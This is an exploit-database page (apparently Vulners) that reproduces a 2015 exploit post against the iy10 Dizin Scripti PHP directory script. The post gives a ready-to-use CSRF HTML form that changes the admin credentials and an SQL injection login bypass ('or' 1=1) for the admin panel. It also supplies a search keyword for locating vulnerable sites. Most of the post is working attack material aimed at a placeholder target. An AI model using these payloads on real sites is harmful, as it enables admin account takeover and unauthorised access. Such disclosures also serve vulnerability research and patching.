Lucene search
K

iy10 Dizin Scripti - Multiple Vulnerabilities

🗓️ 10 Dec 2015 00:00:00Reported by KnocKoutType 
exploitpack
 exploitpack
👁 12 Views

iy10 Dizin Scripti - Multiple Vulnerabilities including CSRF Admin Password Change Exploit and SQL Injection with Authentication Bypas

Code
                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \  
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____ 
                       /_______  //_______  / \______  /
                               \/         \/         \/           
iy10 Dizin Scripti   => Multiple Vulnerabilities (CSRF & Authentication Bypass)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
[~] Åžeker Insanlar :  ZoRLu, ( milw00rm.com ), 
                      Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
					  KedAns-Dz, b3mb4m
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : iy10 Dizin Scripti
|~Affected Version : All Version 
|~Software  : http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html
|~RISK : High
|~Google Keyword :  "Sitenizi dizine eklemek için tıklayın !"

################## ++ CSRF Admin Password Change Exploit ++ ######################################

<html>
  <body>
    <form action="http://[TARGET]/admin/kullaniciayarlar.php" method="POST">
      <input type="hidden" name="kullaniciadi" value="knockout" />
      <input type="hidden" name="sifre" value="password" />
      <input type="hidden" name="Submit" value="Exploit!" />
	  <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

################# ++ SQL Injection with Authentication Bypass ++###########################################

http://[TARGET]/admin 
ID: 'or' 1=1
PW : 'or' 1=1

############################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation